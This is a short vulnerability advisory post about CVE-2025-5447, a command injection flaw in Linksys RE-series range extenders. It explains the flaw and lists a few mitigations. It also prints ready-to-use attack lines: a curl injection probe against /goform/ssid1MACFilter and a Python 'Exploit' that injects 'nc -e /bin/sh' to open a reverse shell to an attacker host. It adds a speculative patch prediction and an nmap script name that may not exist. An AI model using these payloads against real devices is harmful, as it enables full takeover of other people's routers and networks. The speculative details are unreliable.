Linksys RE Series, OS Command Injection, CVE-2025-5447 (Critical)

Listen to this Post

How the CVE Works

The vulnerability in Linksys RE6500, RE6250, RE6300, RE6350, RE7000, and RE9000 routers stems from improper input sanitization in the `ssid1MACFilter` function within /goform/ssid1MACFilter. Attackers can manipulate the `apselect_%d/newap_text_%d` arguments to inject arbitrary OS commands via crafted HTTP requests. Since the function processes these inputs unsafely, remote attackers can execute malicious commands with root privileges, leading to full device compromise. The exploit is remotely triggerable, requiring no user interaction, and has been publicly disclosed, increasing its risk.

DailyCVE Form

Platform: Linksys RE Series
Version: 1.0.013.001 – 1.2.07.001
Vulnerability: OS Command Injection
Severity: Critical
Date: 07/01/2025

Prediction: Patch by Q3 2025

What Undercode Say

Analytics:

curl -X POST "http://<TARGET>/goform/ssid1MACFilter" -d "apselect_1=;id"
nmap --script http-vuln-cve2025-5447 <TARGET_IP>

Exploit:

import requests
payload = "; nc -e /bin/sh <ATTACKER_IP> <PORT>"
requests.post("http://<TARGET>/goform/ssid1MACFilter", data={"apselect_1": payload})

Protection from this CVE:

  • Disable remote admin access.
  • Apply vendor patches immediately.
  • Use network segmentation.

Impact:

  • Full device takeover.
  • Network compromise.
  • Data exfiltration.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

πŸ”JOIN OUR CYBER WORLD [ CVE News β€’ HackMonitor β€’ UndercodeNews ]

πŸ’¬ Whatsapp | πŸ’¬ Telegram

πŸ“’ Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | πŸ”— Linkedin Featured Image

Scroll to Top